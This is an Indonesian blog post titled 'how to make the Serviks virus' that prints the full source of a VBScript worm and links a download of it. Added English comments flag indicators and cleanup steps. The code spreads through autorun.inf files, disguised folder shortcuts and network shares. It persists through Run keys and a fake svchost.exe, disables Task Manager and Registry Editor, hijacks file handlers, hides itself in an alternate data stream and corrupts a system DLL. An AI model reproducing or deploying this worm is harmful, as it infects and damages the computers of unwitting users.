Minggu, 07 Februari 2010

Cara Membuat Virus Serviks

Virus Serviks adalah varian dari virus yuyun yang telah dimodifikasi, karena virus yuyun kurang sempurna menurutku. Saya akan memberi tahu bagaimana cara membuat virus serviks, tapi saya memerlukan enkript file. Tapi tenang saja, saya sudah sediakan di sini: Download Enkript.
Sebenarnya isi virus serviks atau yuyun bisa dilihat dengan menggunakan "Change".
Setelah diubah menggunakan enkript change, hasilnya seperti ini:

' Main body of the script as published (annotated for analysis; code unchanged).
' Indicators visible in this section:
'   - a copy of wscript.exe stored as c:\windows\svchost.exe (svchost.exe outside System32)
'   - hidden/system files named dekstop.ini (misspelled), autorun.inf, auto.exe,
'     df5srvc.bfe and serviks.sys
'   - a write handle opened on msvbvm60.dll in the system folder
' All errors are suppressed, so any step that fails is skipped silently.
On Error Resume Next
Dim fso, ws, status,status1, fly, tf
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Set net = CreateObject("wscript.network")
fly=false
' GetSpecialFolder(1) is the Windows system folder, so despite its name "tmp"
' is not the temp directory; everything written under tmp lands in System32.
tmp=fso.GetSpecialFolder(1)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
docx=ws.SpecialFolders("MyDocuments")
Set swt=WScript.Arguments
on error resume next
' Attributes 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32).
set tf = fso.getfile("c:\windows\system32\wscript.exe")
tf.Attributes = 39
' Masquerading: the script host is duplicated under a system-process name.
' The Run value "Svchost" written in regQ launches this copy.
set tf = fso.getfile("c:\windows\svchost.exe")
tf.Attributes = 0
fso.copyfile "c:\windows\system32\wscript.exe", "c:\windows\svchost.exe"
set tf = fso.getfile("c:\windows\svchost.exe")
tf.Attributes = 39
on error resume next
' status = first command-line argument, when one was passed.
If swt.Count>0 Then
status=swt(0)
End If
' Rename-and-restore probe on msvbvm60.dll in the system folder, followed by
' opening it for writing (mode 2, create=True). If the rename does not take
' effect, fly is set to True; Hertz and UNISKA check that flag.
' NOTE(review): presumably a single-instance marker (the open handle would make
' the rename fail for a second copy) - confirm. Opening with mode 2 also
' truncates the file, so the original DLL content is lost.
if fso.fileexists(tmp+"\msvbvm60.dll") then
set erd=fso.getfile(tmp+"\msvbvm60.dll")
erd.attributes=0
erd.name="fandi.erd"
if erd.name="fandi.erd" then
erd.name="msvbvm60.dll"
set erd=fso.opentextfile(tmp+"\msvbvm60.dll",2,true)
else
fly=true
end if
else
set erd=fso.opentextfile(tmp+"\msvbvm60.dll",2,true)
end if
' AQ = the file named by the first argument; it is the source of every copy below.
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
' auto.exe in the system folder is not an executable: it is overwritten below
' with autorun.inf text and used as the template for every autorun.inf drop.
anv=tmp+"\auto.exe"
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0
Set aut=fso.OpenTextFile(anv,2,True,0)
' autorun.inf content (">" is replaced by CRLF): the open, shell\open and
' shell\explore actions all run dekstop.ini through WScript with //e:VBScript.
isi="[autorun]>open=WScript.exe //e:VBScript dekstop.ini auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript dekstop.ini auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript dekstop.ini auto"
isi=Replace(isi,">",vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39
' &H1c is the per-user local application data folder. "Microsoft\CD Burning"
' is the Windows XP CD staging area - presumably so the pair is written to any
' disc burned from this profile (confirm).
ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"
AQ.Copy ltkc+"\dekstop.ini",True
auto.Copy ltkc+"\autorun.inf",True
' Attributes are cleared on the My Documents path; the copies themselves are
' written to the system folder.
If fso.FileExists(docx+"\df5srvc.bfe") Then fso.GetFile(docx+"\df5srvc.bfe").Attributes=0
AQ.Copy tmp+"\df5srvc.bfe",True
If fso.FileExists(tmp+"\serviks.sys") Then fso.GetFile(tmp+"\serviks.sys").Attributes=0
AQ.Copy tmp+"\serviks.sys",True
' Call sequence: registry changes, decoy document, one pass over all drives,
' My Documents (depth 3 on the 3rd of the month, otherwise 1), network
' locations, then Hertz True, which loops until the process quits.
regQ
Set rara=UNISKA
Hertz False
If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3
call attack_net
Hertz True
' rekursif: runs dropf on a folder and then on its subfolders, recursively.
'   path - folder to process
'   dp   - remaining depth; subfolders are visited only while dp > 0
' Sleeps 50 ms per folder. Errors (e.g. access denied) are ignored.
Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+"\").SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub
' dropf: writes the per-folder artefacts into one folder.
'   path - folder to write into
' Artefacts a responder can search for in an affected folder:
'   autorun.inf + dekstop.ini (attributes 39: read-only, hidden, system, archive),
'   Folder.lnk and other .lnk files whose target is wscript.exe,
'   "Diary Angel.rtf" / "About Me.rtf" on the trigger date.
' Relies on the globals auto, AQ and rara set in the main body.
Sub dropf(path)
On Error Resume Next
' Trigger date: the 1st of a month where month mod 3 = 1 (Jan, Apr, Jul, Oct).
' rara is the decoy document returned by UNISKA.
if day(now)=1 and (month(now)mod 3)=1 then
rara.copy path+"\Diary Angel.rtf"
rara.copy path+"\About Me.rtf"
end if
g1=path+"\autorun.inf"
g2=path+"\dekstop.ini"
' An existing autorun.inf is overwritten unless its attributes are exactly 39,
' which the code treats as "already placed"; a legitimate autorun.inf with
' other attributes is replaced.
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes<>39 Then
g11.Attributes=0
auto.Copy path+"\autorun.inf",True
end if
else
auto.Copy path+"\autorun.inf",True
end if
' Same check for the script copy, stored under the misspelled name dekstop.ini.
If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes<>39 Then
g12.Attributes=0
AQ.Copy path+"\dekstop.ini",True
end if
else
AQ.Copy path+"\dekstop.ini",True
End If
' Folder.lnk doubles as the "shortcuts already created here" marker.
If Not fso.FileExists(path+"\Folder.lnk") Then
kiddrock path+"\Folder","Folder"
' Lure-named shortcuts. Day(now) Mod 3 is 0, 1 or 2 while ww runs from 1 to 6,
' so only the first two names can ever match.
drop=Array("Foto Bugil","Pesan Rahasia","Data Penting","Puisi Cinta","Antivirus","Software")
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then kiddrock path+"\"+d,d
wscript.sleep 60
ww=ww+1
Next
' Shortcuts named after existing subfolders (at most five per folder), so a
' .lnk sits next to the real folder under the same name.
r=0
For Each fldr In fso.GetFolder(path+"\").SubFolders
kiddrock path+"\"+fldr.name,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub
' kiddrock: creates <path>.lnk that runs the dropped script instead of opening a folder.
'   path - shortcut path without the .lnk extension
'   trgt - string passed to the script as its first argument
' Icon is shell32.dll index 3 (the standard folder icon - verify on the target
' OS). Combined with the removal of HKCR\lnkfile\IsShortcut in regQ, the
' shortcut shows no arrow overlay.
' Detection: .lnk files with target wscript.exe and arguments starting
' "//e:VBScript dekstop.ini".
Sub kiddrock(path,trgt)
Set shor=ws.CreateShortcut(path+".lnk")
shor.iconlocation="shell32.dll,3"
shor.targetpath="wscript.exe"
shor.arguments="//e:VBScript dekstop.ini """+trgt+""""
shor.save
End Sub
' attack_net: extends the folder drops to locations listed in the shell's
' network namespace (&H13). For each item it reads detail column 14 and, when
' that string is an existing folder path, runs rekursif on it to depth 4.
' NOTE(review): the meaning of column 14 depends on the Windows version -
' presumably the target path of the network place; confirm.
' colItems is assigned but not used. No value is returned.
' Mitigation context: writable shares reachable from an affected profile
' should be checked for the same autorun.inf / dekstop.ini / .lnk artefacts.
function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if fso.folderexists(t) then
rekursif t,4
end if
Next
End function
' tdr: pause between passes of the Hertz loop.
' Sleeps 180000 ms (3 minutes); quits the script if an error was recorded.
Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub
' UNISKA: writes the decoy text to <system folder>\v.doc and returns it as a
' File object (dropf copies it as "Diary Angel.rtf" and "About Me.rtf").
' On the trigger date (1st of Jan/Apr/Jul/Oct) and only when fly is False, it
' runs "notepad.exe /p" on the file three times, which sends it to the default
' printer.
' The embedded text ends with the same bendot.co.nr address that regQ sets as
' the Internet Explorer start page.
function UNISKA()
On error resume next
x=vbcrlf
' ">" marks a line break in the literal below and is replaced by CRLF.
adv="Diary Angel Cute>>Rasa jatuh cinta memang aneh rasanya >Q kenal fandy lewat no.Hp nyasar, dari perkenalan itu Q agak jual mahal ke dy (maklum cwe).>Hari berganti hari Q mulai penasaran ma dy, rasanya hatiku telah di kuasai oleh dy.>Q dan dy sepakat untuk ketemuan di kampusQ, dy pun datang pakai jaket hitam dengan motor warna hitam pula.>Alangkah terkejutnya, Q diajak dy kerumahnya.>Kita ngobrol tentang pekerjaan dy, dy jg banyak tanya tentang Q di kampus. >Waktu pun cepat berlalu, karena asik ngobrol tak terasa hari sudah sore.>Q pun minta di antar pulang, Q boncengan ma dy seolah-olah kt sudah pacaran.>Hujan pun datang disaat kt dalam perjalanan pulang, rasa dingin menyelimuti tubuhku ini.>Dengan gagahnya dy memberi Q jaket yg dy pakai, hujan pun makin deras dan cuaca semakin dingin.>Rasa sayang ini semakin menguasai pikiranku, ingin rasanya Q peluk dy.>>Setelah Q sampai di rumah, dy terburu-buru pulang karena hujan makin deras.>Satu jam setelah dy pulang, dy kasih kabar kalau sudah sampai rumah dengan selamet.>>Yang bikin Q bingung, perasaan tadi dy pulang sendiri?>Kenapa dy pulang dengan selamet, siapakah selamet?>>Cerita ini sebagian adalah kisah nyata, tapi karena terbatas oleh waktu.>Maka cukup sekian dan terimakasih.>>>(www.bendot.co.nr)"
adv=replace(adv,">",x)
set serviks=fso.opentextfile(tmp+"\v.doc",2,true)
serviks.write adv
serviks.close
if day(now)=1 and (month(now)mod 3)=1 then
if fly=false then
for i=1 to 3
ws.run "notepad.exe /p """+tmp+"\v.doc"""
next
end if
end if
set UNISKA=fso.getfile(tmp+"\v.doc")
end function
' regQ: applies all registry changes. Called once from the main body and again
' on every pass of the Hertz loop, so values restored by hand are rewritten
' while the script is still running.
' For a responder this is the list of values to inspect and restore: four Run
' entries, two policy values, the SuperHidden settings, five file-type
' handlers, the IE start page and (NTFS only) an alternate data stream.
' Relies on the globals docx, tmp, ltkc and AQ set in the main body.
Sub regQ()
On Error Resume Next
' Only on the 1st of a month: registers a shell namespace item named "Serviks"
' under the desktop using a fixed, non-random CLSID.
if day(now)=1 then
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Serviks"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"
ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""
end if
' Deleting IsShortcut removes the arrow overlay from .lnk icons, so the
' shortcuts made by kiddrock look like ordinary folders.
ws.regdelete "HKCR\lnkfile\IsShortcut"
' Browser start page is pointed at the address embedded in the decoy text.
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.bendot.co.nr"
' Persistence: three per-user Run values (Df5serv, Svchost, Explorer), each
' launching one dropped copy through a script host with //e:VBScript.
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Df5serv","Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Svchost","c:\windows\svchost.exe //e:VBScript """+tmp+"\serviks.sys"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+ltkc+"\dekstop.ini"""
' Defence impairment: Registry Editor and Task Manager are disabled by policy
' for the current user.
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
' SuperHidden: checked, unchecked and default values are all forced to 0 -
' presumably so the Folder Options setting for protected system files no
' longer reveals the hidden+system copies (confirm on the target OS). The
' WarningIfNotDefault string is a distinctive indicator.
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault","sorry serviks like your computer"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue",0,"REG_DWORD"
' File-type handler changes: the lnkfile Delete and inffile Install verbs are
' set to logoff.exe; the regfile Merge and VBS/VBE Open verbs are set to run
' the dropped script. Importing a .reg fix or running a .vbs cleanup tool
' therefore starts the script instead - restore these handlers first, or from
' an environment where they are not in effect.
ws.RegWrite "HKCR\lnkfile\shell\Delete\command", "logoff.exe"
ws.RegWrite "HKCR\regfile\shell\Merge\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
ws.RegWrite "HKCR\inffile\shell\Install\command", "logoff.exe"
ws.RegWrite "HKCR\VBSfile\shell\Open\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
ws.RegWrite "HKCR\VBEfile\shell\Open\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
' NTFS only: the script body is written to a path of the form
' <Windows folder>\:<name> - apparently an alternate data stream attached to
' the Windows directory - and a machine-wide Run value "WinUpdate" launches it.
' Such a stream is not shown in a normal directory listing; use a stream-aware
' tool (e.g. dir /r on newer Windows) to find it.
if lcase(fso.getdrive("c:").FileSystem)="ntfs" then
erdQ=AQ.openastextstream(1,0).read(AQ.size)
www=fso.GetSpecialFolder(0)
set jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)
jjk.write erdQ
jjk.close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""
end if
End Sub
' Hertz: main loop over all drives.
'   ooo - False: one pass, then return; True: repeat until the script quits
' Each pass runs rekursif on every drive (depth 4 for DriveType 1, i.e.
' removable media, depth 2 for the rest), then either waits in tdr (3 minutes)
' or quits when fly is True, and finally re-applies the registry changes
' through regQ.
' Consequence for clean-up: the wscript.exe process (or the copy at
' c:\windows\svchost.exe) has to be stopped before files and registry values
' are restored, otherwise they are rewritten on the next pass; removable media
' attached meanwhile receives the same drops.
Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

Nah itulah code yang ada pada tubuh virus serviks, untuk mendownload virus serviks klik di sini: New Serviks.rar

Sekian ilmu yang bisa saya berikan kepada anda, semoga anda tidak menyalahgunakan ilmu ini.
Segala risiko ditanggung anda sendiri, saya tidak bertanggung jawab atas apa yang anda lakukan dengan code di atas.